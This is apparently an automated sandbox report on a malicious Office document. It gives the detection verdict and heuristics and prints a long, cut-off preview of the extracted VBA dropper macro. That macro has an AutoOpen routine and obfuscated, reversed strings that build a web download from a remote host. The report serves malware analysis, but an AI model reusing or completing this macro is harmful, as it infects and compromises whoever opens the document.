Verdict: MALICIOUS
Risk Score: 202

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The critical heuristic 'OLE_VBA_SHELL' indicates the macro uses the Shell() function, which is commonly used to download and execute additional payloads. The ClamAV detection name 'Doc.Dropper.Agent-6544906-0' further confirms its malicious nature as a dropper.
Heuristics (6)

- ClamAV: Doc.Dropper.Agent-6544906-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Dropper.Agent-6544906-0
- VBA macros detected [medium, OLE_VBA_MACROS, 2 related findings]: Document contains VBA macro code
- Shell() call in VBA [critical, OLE_VBA_SHELL]: Shell() call in VBA
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 119608 bytes | b33e6c5c40bb4c03b9b1b91a332b0b243a87a6353948d0acb7868ff65d0ae4bb |
Script preview (first 1,000 lines of the extracted script; the preview is cut off below):

```vb
Attribute VB_Name = "XdCAsFf"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Zwwljw(WVuDs)
dtwcj = OWudZ
IciLH = vVDENc
pwIMP = dtJuji + Sgn(71781 - JNGfVY - YVqLN + Fix(24725)) - 15221 - CDbl(43028)
ZfUNq = 16183
End Sub
Sub Jiwwa(hwjWkl)
wYsDw = bRBBS
XEVAJ = GAHzB
crYns = rcWOIA + Sgn(75112 - QZhoI - jaCuMz + Fix(43435)) - 97420 - CDbl(57959)
AwXWbE = 84991
YWKpzI = VNsGjT
oYqBo = buItwl
JcRpL = tQmRqb + Sgn(88703 - rkdszR - JwfZQN + Fix(24314)) - 57235 - CDbl(26124)
rOums = 93574
uwaCC = zaujj
iAATh = ilQvTj
YAzMzL = nazwqi + Sgn(14146 - jzVhcS - QquNmO + Fix(22200)) - 75244 - CDbl(97435)
tPdGzN = 90468
End Sub
Sub kXEDB(CsmERa)
DTqkIS = ZlbnwT
Odkjla = rviMp
KtbHV = spwnW + Sgn(83810 - IuzvRE - fnOBXf + Fix(1204)) - 46698 - CDbl(23195)
MXTAc = 60650
URabH = qOpqR
szMHH = WfZjqX
dYbwY = jPqaAi + Sgn(12727 - VYnip - FUYzPL + Fix(29502)) - 10319 - CDbl(942)
laDGdu = 28157
End Sub
Sub Autoopen()
On Error Resume Next
QwlEB = MdAMB
mABoP = zcjNi
OGpZaA = aKXSsz + Sgn(1950 - zmlKC - uzlZP + Fix(82776)) - 37820 - CDbl(89362)
jDRKpv = 68791
wYOsRvwrLPZC (DARawO + EdYfjBd + IrOrAp)
CcWUIE = LJbjXr
bmLWP = iJldz
CQYcct = iBpnVn + Sgn(60776 - rrptYW - hECUl + Fix(79165)) - 29161 - CDbl(86242)
tWZBin = 62456
End Sub
Sub maJNlz(jjMqRv)
ZMjjTZ = IITIw
wOiEEL = HwNGvF
lBcYa = JzMSzT + Sgn(13215 - iSpFnF - UFIlGF + Fix(54446)) - 51820 - CDbl(98268)
oOMVHf = 89649
CkBBME = EzdjXA
zUQvT = UqhWNp
EtWXm = YlUqTt + Sgn(7829 - CHzub - jOsELM + Fix(14682)) - 24503 - CDbl(22783)
foWtj = 20341
FuccWf = zCPmSj
blNfpB = LZnLZ
KiWKT = jtAzzJ + Sgn(69046 - HJzUu - UDCJOr + Fix(16817)) - 17496 - CDbl(88733)
oRzMT = 36407
End Sub
Sub ETaCpa(NVFoKC)
SRwwHb = wciXz
KiMXto = sBTZfc
vslUw = sVAAOM + Sgn(82599 - Irsfp - bfJivW + Fix(48510)) - 68274 - CDbl(32839)
XTiLRD = 81801
End Sub
Attribute VB_Name = "YHnphLIjz"
Sub kKbtp(oQjDZb)
IECdv = fAEAdG
HmzzZO = NzGWd
wXBUnp = pikfiN + Sgn(96480 - KfJzm - aCSld + Fix(20598)) - 5186 - CDbl(8343)
wjzRm = 15745
End Sub
Function EdYfjBd()
On Error Resume Next
kNoJsc = SPMQH
TwYqW = UjjJi
lUmwiv = JLvwJ + Sgn(55464 - zAzVR - vBpBHJ + Fix(90229)) - 30996 - CDbl(75661)
ADJPG = 15175
iwskWY = DJjRjA
AffjkW = lEEHr
uAAbX = JIpOGV + Sgn(84480 - PwnAl - ftESw + Fix(25098)) - 85246 - CDbl(69596)
tocfWk = 6879
pGHoPXmr = ChkBM("0ajTYjH+';)CD'+'S'+'3'+'7'+'Pj()'+'zNJ'+'me'+'tI-'+'ezNJ+zNJkzNJ+zNJovnIz'+'NJ'+'('+'&;'+')CDS'+'37P'+'j'+' ,)(b'+'Hdg'+'N'+'Ggkks", 45294 + 3 - 45294, 45294 + 121 - 45294)
IuFrm = QYKsG
mRDWZW = viiKi
Pvadp = fMpiG + Sgn(61996 - tiotlU - wGbkGG + Fix(99928)) - 68845 - CDbl(15743)
ijWSXQ = 80794
PdiQGV = ZfzhEZ
NkRQP = wICpsQ
wSIBz = IWzzZ + Sgn(529 - KQwtCv - doVKi + Fix(29384)) - 19615 - CDbl(60008)
bsYqE = 98996
fQZvw = ChkBM("Lz]RAhC[,'37Pj' ecalPEr-69]RAhC[,)17]RAhC[+301]RAhC[+701]RAhC[+78]RAhC[(ecalPEr- )'}'+'}'+'{'+'hctac};k'+'a'+'erb'djBa", 90678 + 5 - 90678, 90678 + 112 - 90678)
WvimR = QmrPkh
MInwqn = wzTjI
QVEBJa = IZwUJ + Sgn(16398 - XiTSfc - uSFbzQ + Fix(79681)) - 20662 - CDbl(48258)
wdnPui = 80162
lrjSB = uchKp
ROQWED = UqhET
jtmKXI = zYdEPi + Sgn(45482 - tUaDRW - mYMWzr + Fix(49140)) - 39675 - CDbl(9123)
PXRMHR = 19092
wPVWlQX = ChkBM("47+';)3312'+'82 ,'+'00001(tx'+'en.ds'+'adas'+'n37Pj = BS'+'N3'+'7Pj;tn'+'e'+'ilCbeW.te'+'N.m'+'et'+'syS )'+'zRIcY%", 11808 + 6 - 11808, 11808 + 107 - 11808)
JotkL = VfqbW
BBYoH = wBLoX
YRzLG = lDQBI + Sgn(64882 - BMFAR - wwzlO + Fix(98838)) - 55257 - CDbl(9463)
TIqURp = 22713
BJANH = bFCdq
TKzXwP = QjGjww
aLQVF = IuvYib + Sgn(96633 - zKhQU - sGcww + Fix(315)) - 38097 - CDbl(42921)
udEQnw = 31089
JwsJqlBLzlj = ChkBM("QaN't'+'th@/BxuenU/s'+'w.sawa//:'+'p'+'tth '+'zNJ ='+' XC'+'DA37Pj'wwKt", 89407 + 5 - 89407, 89407 + 64 - 89407)
jXuoZO = pVRhS
ZPbsb = jUZFc
PBviKK = hVAtZ + Sgn(30924 - sDHbi - DFUOcY + Fix(23435)) - 59120 - CDbl(62876)
HSSB
```

... (truncated)